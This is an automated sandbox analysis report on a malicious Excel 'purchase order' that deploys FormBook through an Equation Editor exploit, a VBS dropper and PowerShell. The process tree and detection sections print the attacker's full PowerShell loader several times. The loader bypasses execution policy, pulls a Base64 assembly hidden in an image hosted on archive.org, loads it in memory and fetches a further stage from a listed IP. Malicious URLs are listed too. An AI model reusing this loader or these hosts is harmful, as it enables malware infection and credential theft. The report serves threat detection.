Windows Analysis Report
Mac Purchase Order PO102935.xls

Overview

General Information

Sample name: Mac Purchase Order PO102935.xls
Analysis ID: 1493701
MD5: e07cfed85c1ddf5a98b21de6cb894a18
SHA1: 092241ff646b40b753d18973ec61638a0f70fa98
SHA256: 5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553
Tags: xls
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2456 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • wfbjvizcWo.exe (PID: 1372 cmdline: "C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • find.exe (PID: 3408 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 5816034B0B629756163B80838853B730)
                • wfbjvizcWo.exe (PID: 1980 cmdline: "C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 3576 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x178d:$obj2: \objdata
  • 0x1773:$obj3: \objupdate
  • 0x174b:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x178d:$obj2: \objdata
  • 0x1773:$obj3: \objupdate
  • 0x174b:$obj5: \objautlink

Source | Rule | Description | Author | Strings
0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17102:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x3cd39:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x24fe8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
11.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
11.2.RegAsm.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16302:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
11.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17102:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 192.210.150.33, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 300, TargetFilename: C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted, truncated in report]
Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 300, Protocol: tcp, SourceIp: 192.210.150.33, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted, truncated in report]
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted, truncated in report]
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
            Source: Process started, Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2456, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2456, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 443
            Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2456, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\lkdpr2vr.wxa.ps1

            Data Obfuscation

            Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Timestamp:2024-08-16T09:32:48.120716+0200
            SID:2049038
            Severity:1
            Source Port:443
            Destination Port:49171
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg, Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFj, Virustotal: Detection: 9%
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg, Virustotal: Detection: 10%
            Source: http://192.210.150.33/143/WRG.txt, Virustotal: Detection: 9%
            Source: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc, Virustotal: Detection: 9%
            Source: Mac Purchase Order PO102935.xls, Virustotal: Detection: 9%
            Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
